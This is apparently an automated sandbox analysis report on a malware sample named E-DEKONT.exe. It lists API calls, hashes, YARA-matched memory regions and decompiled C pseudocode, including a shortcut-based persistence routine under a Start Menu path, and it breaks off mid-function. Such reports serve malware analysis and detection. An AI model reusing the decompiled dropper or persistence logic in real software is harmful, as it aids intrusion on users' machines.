                                                                            0x004047f0
                                                                            0x004047f3
                                                                            0x004047fa
                                                                            0x00404802
                                                                            0x00404805
                                                                            0x00404809
                                                                            0x00404810
                                                                            0x00404818
                                                                            0x00404872
                                                                            0x0040481a
                                                                            0x0040481b
                                                                            0x00404822
                                                                            0x0040482c
                                                                            0x00404834
                                                                            0x00404841
                                                                            0x00404855
                                                                            0x00404859
                                                                            0x00404859
                                                                            0x00404855
                                                                            0x0040485e
                                                                            0x0040486b
                                                                            0x0040486b
                                                                            0x00404818
                                                                            0x00000000
                                                                            0x004047d0
                                                                            0x004047be
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004047c4
                                                                            0x00000000
                                                                            0x0040472f
                                                                            0x0040473c
                                                                            0x00404745
                                                                            0x00404752
                                                                            0x00404752
                                                                            0x00404759
                                                                            0x0040475f
                                                                            0x00404768
                                                                            0x0040476b
                                                                            0x0040476e
                                                                            0x00404776
                                                                            0x00404779
                                                                            0x0040477c
                                                                            0x00404782
                                                                            0x00404789
                                                                            0x00404790
                                                                            0x00404a27
                                                                            0x00404a39
                                                                            0x00404796
                                                                            0x00404799
                                                                            0x00000000
                                                                            0x00404799
                                                                            0x00404790

                                                                            APIs
                                                                            • GetDlgItem.USER32(?,000003FB), ref: 00404735
                                                                            • SetWindowTextW.USER32(00000000,?), ref: 0040475F
                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 00404810
                                                                            • CoTaskMemFree.OLE32(00000000), ref: 0040481B
                                                                            • lstrcmpiW.KERNEL32(Call,0042D248,00000000,?,?), ref: 0040484D
                                                                            • lstrcatW.KERNEL32(?,Call), ref: 00404859
                                                                            • SetDlgItemTextW.USER32(?,000003FB,?), ref: 0040486B
                                                                              • Part of subcall function 004058C8: GetDlgItemTextW.USER32(?,?,00000400,004048A2), ref: 004058DB
                                                                              • Part of subcall function 00406516: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\E-DEKONT.exe",0040334E,C:\Users\user\AppData\Local\Temp\,75F63420,004035BF,?,00000006,00000008,0000000A), ref: 00406579
                                                                              • Part of subcall function 00406516: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406588
                                                                              • Part of subcall function 00406516: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\E-DEKONT.exe",0040334E,C:\Users\user\AppData\Local\Temp\,75F63420,004035BF,?,00000006,00000008,0000000A), ref: 0040658D
                                                                              • Part of subcall function 00406516: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\E-DEKONT.exe",0040334E,C:\Users\user\AppData\Local\Temp\,75F63420,004035BF,?,00000006,00000008,0000000A), ref: 004065A0
                                                                            • GetDiskFreeSpaceW.KERNEL32(0042B218,?,?,0000040F,?,0042B218,0042B218,?,00000001,0042B218,?,?,000003FB,?), ref: 0040492E
                                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404949
                                                                              • Part of subcall function 00404AA2: lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B43
                                                                              • Part of subcall function 00404AA2: wsprintfW.USER32 ref: 00404B4C
                                                                              • Part of subcall function 00404AA2: SetDlgItemTextW.USER32(?,0042D248), ref: 00404B5F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                            • String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra$Call
                                                                            • API String ID: 2624150263-2258434197
                                                                            • Opcode ID: 2bf24cd5b38970458feb5e26e62e94a42910e0745c64cb7450705bda54c983ff
                                                                            • Instruction ID: b9cd804fa769b9c0a994065299bacf789a546679ae48146ccc486c737bfd155f
                                                                            • Opcode Fuzzy Hash: 2bf24cd5b38970458feb5e26e62e94a42910e0745c64cb7450705bda54c983ff
                                                                            • Instruction Fuzzy Hash: CBA175F1A00209ABDB11AFA5CD41AAFB7B8EF84354F10847BF601B62D1D77C99418B6D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02B66CB5 Relevance: 5.3, Strings: 4, Instructions: 289COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108852449339.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_2b60000_E-DEKONT.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 2#q$Q=v/$Q=v/$v}Hj
                                                                            • API String ID: 0-1687289050
                                                                            • Opcode ID: d818b0eb64ce0ad9854e9fccbfcc3385ff31f2ec0a6c17407454b3175cbc674f
                                                                            • Instruction ID: 36a3fe988cfdbc39702dcf4f4b6a954688192d9d274fef51d2d2f847ed6cded2
                                                                            • Opcode Fuzzy Hash: d818b0eb64ce0ad9854e9fccbfcc3385ff31f2ec0a6c17407454b3175cbc674f
                                                                            • Instruction Fuzzy Hash: A0A1587924434A8FEB308E28CDD97EA37A2EF563D0F494269CC859B185D7398A46C701
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02B66CCE Relevance: 5.3, Strings: 4, Instructions: 287COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108852449339.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_2b60000_E-DEKONT.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 2#q$Q=v/$Q=v/$v}Hj
                                                                            • API String ID: 0-1687289050
                                                                            • Opcode ID: 266755f435d5340c1b58bb6a662764ffba161568258390d6c18ae8719b3149d7
                                                                            • Instruction ID: fa571488b7b58ddfd92660c9765f9fc882ba45168a7d2159c67b59bf7d66dcec
                                                                            • Opcode Fuzzy Hash: 266755f435d5340c1b58bb6a662764ffba161568258390d6c18ae8719b3149d7
                                                                            • Instruction Fuzzy Hash: 20A1697924434A8FEB308E28CDD97EA37A2EF523D0F49426ACC859B185D73D8A46C701
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02B67394 Relevance: 4.1, Strings: 3, Instructions: 304COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108852449339.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_2b60000_E-DEKONT.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Q=v/$Q=v/$v}Hj
                                                                            • API String ID: 0-35103605
                                                                            • Opcode ID: f3def7bab03f3e2fa1fa34b3490e0d401e7b68ae3f96e22cbcbcd137bbf239d6
                                                                            • Instruction ID: 9a09b174b7ae1fa0413e452b5ddb8539fce55b97ffc2484baee44eebf7a0a3f2
                                                                            • Opcode Fuzzy Hash: f3def7bab03f3e2fa1fa34b3490e0d401e7b68ae3f96e22cbcbcd137bbf239d6
                                                                            • Instruction Fuzzy Hash: 0AA157791083879BEB369E28C9853DA3BA2AF132F0F98456ECCC85F446CB3645C5C212
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02B67288 Relevance: 4.1, Strings: 3, Instructions: 301COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108852449339.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_2b60000_E-DEKONT.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Q=v/$Q=v/$v}Hj
                                                                            • API String ID: 0-35103605
                                                                            • Opcode ID: e0372ee866f21c3f0097aa7294013caa11e2b32baa3a6f1c70cfdc2503572629
                                                                            • Instruction ID: effdaebb0e646da842b34b8df0328acc5298e79a3eca10591ac1b60e2dc6e0ef
                                                                            • Opcode Fuzzy Hash: e0372ee866f21c3f0097aa7294013caa11e2b32baa3a6f1c70cfdc2503572629
                                                                            • Instruction Fuzzy Hash: 4AA157791083879BEB369E28C9953DA3BA2EF132F0F98456ECCC85F446DB3645C5C212
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02B67148 Relevance: 4.0, Strings: 3, Instructions: 299COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108852449339.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_2b60000_E-DEKONT.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Q=v/$Q=v/$v}Hj
                                                                            • API String ID: 0-35103605
                                                                            • Opcode ID: fc9cf44c014810ac6ec75f277f6a8ff6402e9591a723b13bbf683d2c17637308
                                                                            • Instruction ID: 8a8a073b48ec5c4765462bfb91dc0897eb8176d204b374ae4a9d73d78238638f
                                                                            • Opcode Fuzzy Hash: fc9cf44c014810ac6ec75f277f6a8ff6402e9591a723b13bbf683d2c17637308
                                                                            • Instruction Fuzzy Hash: A7A149791083869BEB359E28C9953DA3BA2EF133E4F98456ECCC85F446D73A45C5C212
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02B67020 Relevance: 4.0, Strings: 3, Instructions: 298COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108852449339.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_2b60000_E-DEKONT.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Q=v/$Q=v/$v}Hj
                                                                            • API String ID: 0-35103605
                                                                            • Opcode ID: c814d183f9171d3b4ae4d7749d851c2a53aca80e710e7f13d6afb68847136e00
                                                                            • Instruction ID: 00dbcd36802828604c248dedcd926c5abb1a44e35f386c5cecc9da7ba32b9d87
                                                                            • Opcode Fuzzy Hash: c814d183f9171d3b4ae4d7749d851c2a53aca80e710e7f13d6afb68847136e00
                                                                            • Instruction Fuzzy Hash: EDA158791083879BEB359E28C9953DA3BA2EF133E0F98456ECCC85F446D73645C5C212
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02B66E85 Relevance: 4.0, Strings: 3, Instructions: 296COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108852449339.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_2b60000_E-DEKONT.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Q=v/$Q=v/$v}Hj
                                                                            • API String ID: 0-35103605
                                                                            • Opcode ID: dffba3f43f7ebc82137cfae4e578b0442fc1c2406bba49dadb016ae34e3eee5e
                                                                            • Instruction ID: e8d1d898c627bc0e686f60b0b0fbccbbbb917f85e73865d9e3e3429594c220a2
                                                                            • Opcode Fuzzy Hash: dffba3f43f7ebc82137cfae4e578b0442fc1c2406bba49dadb016ae34e3eee5e
                                                                            • Instruction Fuzzy Hash: D6A148791083868BEB359E28C9953DA3BA2EF133E0F98456ECCC85F446D73A55C5C212
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02B66EF6 Relevance: 4.0, Strings: 3, Instructions: 296COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108852449339.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_2b60000_E-DEKONT.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Q=v/$Q=v/$v}Hj
                                                                            • API String ID: 0-35103605
                                                                            • Opcode ID: 71f055f61aeadcd4923cf639d781be622db5098ab53702c5083304510269172d
                                                                            • Instruction ID: aad66248f404406fce81b4887247e269571c5c7b136dabbce821b69d22c54c52
                                                                            • Opcode Fuzzy Hash: 71f055f61aeadcd4923cf639d781be622db5098ab53702c5083304510269172d
                                                                            • Instruction Fuzzy Hash: A6A15B791083869BEB319E28CD953DA3BA2EF133F0F98427ECCC45B586D73A5585C642
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02B66E56 Relevance: 4.0, Strings: 3, Instructions: 272COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108852449339.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_2b60000_E-DEKONT.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Q=v/$Q=v/$v}Hj
                                                                            • API String ID: 0-35103605
                                                                            • Opcode ID: d92d6615d7613a6af528b69bc217965e801271a87ceb7a4bd47d8cf3cc5887ea
                                                                            • Instruction ID: e46f3106e68be4909897249bd01937c1fb749fe61b68b41c6205f633caee5c1f
                                                                            • Opcode Fuzzy Hash: d92d6615d7613a6af528b69bc217965e801271a87ceb7a4bd47d8cf3cc5887ea
                                                                            • Instruction Fuzzy Hash: ECA139791043868FDB319E28CD953DA3BA2EF523E0F59417ECC885B545D73A4686C711
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02B66DF3 Relevance: 4.0, Strings: 3, Instructions: 258COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108852449339.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_2b60000_E-DEKONT.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Q=v/$Q=v/$v}Hj
                                                                            • API String ID: 0-35103605
                                                                            • Opcode ID: 05c2bd5554eff1ffa58d1b35ed90b3e0625fa3edd5af651f9c2a1183a1a22e2f
                                                                            • Instruction ID: b8999ed81a0004c296d8e64295e4b2ad5fe310431dc37b2ea2b17d53ec0234b9
                                                                            • Opcode Fuzzy Hash: 05c2bd5554eff1ffa58d1b35ed90b3e0625fa3edd5af651f9c2a1183a1a22e2f
                                                                            • Instruction Fuzzy Hash: 5391487964434A8FEB308E38CDD57DA37A2EF523D0F19427ACC89AB185D7398A46C701
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02B66F69 Relevance: 4.0, Strings: 3, Instructions: 249COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108852449339.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_2b60000_E-DEKONT.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Q=v/$Q=v/$v}Hj
                                                                            • API String ID: 0-35103605
                                                                            • Opcode ID: 1e722726efeed66b7d42f8167c1a2ae31e58891d823a01df2961c36818c8aa5d
                                                                            • Instruction ID: 1423c2baf93683bb6e19c879fb81cd5d4fdbf8d72c08d62216546420301fafa3
                                                                            • Opcode Fuzzy Hash: 1e722726efeed66b7d42f8167c1a2ae31e58891d823a01df2961c36818c8aa5d
                                                                            • Instruction Fuzzy Hash: C991467964438A8FDB308E28CDD57DA37B2EF523D0F19427ACC88AB185D7398A46C701
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02B66FCB Relevance: 4.0, Strings: 3, Instructions: 240COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108852449339.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_2b60000_E-DEKONT.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Q=v/$Q=v/$v}Hj
                                                                            • API String ID: 0-35103605
                                                                            • Opcode ID: 576ff42e257a1448d3192849f85beb698130295c8f558adf185966ec34fdf3d1
                                                                            • Instruction ID: 98456cffed8df47db789efced960ffe11f11aa186d114367b2ba0173ee9417e1
                                                                            • Opcode Fuzzy Hash: 576ff42e257a1448d3192849f85beb698130295c8f558adf185966ec34fdf3d1
                                                                            • Instruction Fuzzy Hash: 4191477964434A8FEB308E38CDD57DA37A2EF523D0F59427ACC89AB185D7398A46C701
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004020FE Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 67%
                                                                            			E004020FE() {
				signed int _t52;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t80;
				void* _t83;
				intOrPtr* _t91;
				signed int _t101;
				signed int _t105;
				void* _t107;

				 *((intOrPtr*)(_t107 - 0x4c)) = E00402C37(0xfffffff0);
				 *((intOrPtr*)(_t107 - 0x3c)) = E00402C37(0xffffffdf);
				 *((intOrPtr*)(_t107 - 8)) = E00402C37(2);
				 *((intOrPtr*)(_t107 - 0x48)) = E00402C37(0xffffffcd);
				 *((intOrPtr*)(_t107 - 0xc)) = E00402C37(0x45);
				_t52 =  *(_t107 - 0x18);
				 *(_t107 - 0x44) = _t52 & 0x00000fff;
				_t101 = _t52 & 0x00008000;
				_t105 = _t52 >> 0x0000000c & 0x00000007;
				 *(_t107 - 0x38) = _t52 >> 0x00000010 & 0x0000ffff;
				if(E00405BCA( *((intOrPtr*)(_t107 - 0x3c))) == 0) {
					E00402C37(0x21);
				}
				_t56 = _t107 + 8;
				__imp__CoCreateInstance(0x4085e8, _t83, 1, 0x4085d8, _t56);
				if(_t56 < _t83) {
					L14:
					 *((intOrPtr*)(_t107 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t60 =  *((intOrPtr*)(_t107 + 8));
					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4085f8, _t107 - 0x30);
					 *((intOrPtr*)(_t107 - 0x10)) = _t61;
					if(_t61 >= _t83) {
						_t64 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)(_t107 - 0x10)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x3c)));
						if(_t101 == _t83) {
							_t80 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t80 + 0x24))(_t80, L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Ydervgg\\Superassume\\dodecaheddra\\Sldede");
						}
						if(_t105 != _t83) {
							_t78 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
						}
						_t66 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x38));
						_t91 =  *((intOrPtr*)(_t107 - 0x48));
						if( *_t91 != _t83) {
							_t76 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x44));
						}
						_t68 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
						_t70 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
						if( *((intOrPtr*)(_t107 - 0x10)) >= _t83) {
							_t74 =  *((intOrPtr*)(_t107 - 0x30));
							 *((intOrPtr*)(_t107 - 0x10)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x4c)), 1);
						}
						_t72 =  *((intOrPtr*)(_t107 - 0x30));
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t62 =  *((intOrPtr*)(_t107 + 8));
					 *((intOrPtr*)( *_t62 + 8))(_t62);
					if( *((intOrPtr*)(_t107 - 0x10)) >= _t83) {
						_push(0xfffffff4);
					} else {
						goto L14;
					}
				}
				E00401423();
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t107 - 4));
				return 0;
			}






















                                                                            0x00402107
                                                                            0x00402111
                                                                            0x0040211b
                                                                            0x00402125
                                                                            0x00402130
                                                                            0x00402133
                                                                            0x0040214d
                                                                            0x00402150
                                                                            0x00402156
                                                                            0x00402159
                                                                            0x00402163
                                                                            0x00402167
                                                                            0x00402167
                                                                            0x0040216c
                                                                            0x0040217d
                                                                            0x00402185
                                                                            0x0040223c
                                                                            0x0040223c
                                                                            0x00402243
                                                                            0x0040218b
                                                                            0x0040218b
                                                                            0x0040219a
                                                                            0x0040219e
                                                                            0x004021a1
                                                                            0x004021a7
                                                                            0x004021b5
                                                                            0x004021b8
                                                                            0x004021ba
                                                                            0x004021c5
                                                                            0x004021c5
                                                                            0x004021ca
                                                                            0x004021cc
                                                                            0x004021d3
                                                                            0x004021d3
                                                                            0x004021d6
                                                                            0x004021df
                                                                            0x004021e2
                                                                            0x004021e8
                                                                            0x004021ea
                                                                            0x004021f4
                                                                            0x004021f4
                                                                            0x004021f7
                                                                            0x00402200
                                                                            0x00402203
                                                                            0x0040220c
                                                                            0x00402212
                                                                            0x00402214
                                                                            0x00402222
                                                                            0x00402222
                                                                            0x00402225
                                                                            0x0040222b
                                                                            0x0040222b
                                                                            0x0040222e
                                                                            0x00402234
                                                                            0x0040223a
                                                                            0x0040224f
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040223a
                                                                            0x00402245
                                                                            0x00402ac2
                                                                            0x00402ace

                                                                            APIs
                                                                            • CoCreateInstance.OLE32(004085E8,?,00000001,004085D8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040217D
                                                                            Strings
                                                                            • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\Sldede, xrefs: 004021BD
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: CreateInstance
                                                                            • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\Sldede
                                                                            • API String ID: 542301482-935500906
                                                                            • Opcode ID: 0ef6bbf442897ef527506715e7f738d692543a3abdbaa0dc7b7a5ab61d8902ee
                                                                            • Instruction ID: 2ba5a37aa1c239f751097cd18d9f1051e5d6a8806e2346af1523e8cbd5355f1b
                                                                            • Opcode Fuzzy Hash: 0ef6bbf442897ef527506715e7f738d692543a3abdbaa0dc7b7a5ab61d8902ee
                                                                            • Instruction Fuzzy Hash: 504139B5A00208AFCB10DFE4C988AAEBBB5FF48314F20457AF515EB2D1DB799941CB44
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02B83D61 Relevance: 3.6, Strings: 2, Instructions: 1067COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108852449339.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_2b60000_E-DEKONT.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: MemoryProtectVirtual
                                                                            • String ID: 003%$Fd
                                                                            • API String ID: 2706961497-3480626170
                                                                            • Opcode ID: 868f49dcc24e561babb3abe965351983664b02386f25a0428222fcf0f1ac00ba
                                                                            • Instruction ID: 6f9711f31d7b1e14759b9679afdfe06ca9a551d4fb5a1942c291c6c6b6bb52b1
                                                                            • Opcode Fuzzy Hash: 868f49dcc24e561babb3abe965351983664b02386f25a0428222fcf0f1ac00ba
                                                                            • Instruction Fuzzy Hash: 1C728A715043828FCB35AE3889983D67BE29F532A0F5981EECCD98F597D335858AC712
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004072B4 Relevance: 2.8, Strings: 2, Instructions: 300COMMONCrypto
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E004072B4(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr* _v32;
				signed int* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v116;
				signed int _v176;
				signed int _v180;
				signed int _v240;
				signed int _t166;
				signed int _t168;
				intOrPtr _t175;
				signed int _t181;
				void* _t182;
				intOrPtr _t183;
				signed int* _t184;
				signed int _t186;
				signed int _t187;
				signed int* _t189;
				signed int _t190;
				intOrPtr* _t191;
				intOrPtr _t192;
				signed int _t193;
				signed int _t195;
				signed int _t200;
				signed int _t205;
				void* _t207;
				short _t208;
				signed char _t222;
				signed int _t224;
				signed int _t225;
				signed int* _t232;
				signed int _t233;
				signed int _t234;
				void* _t235;
				signed int _t236;
				signed int _t244;
				signed int _t246;
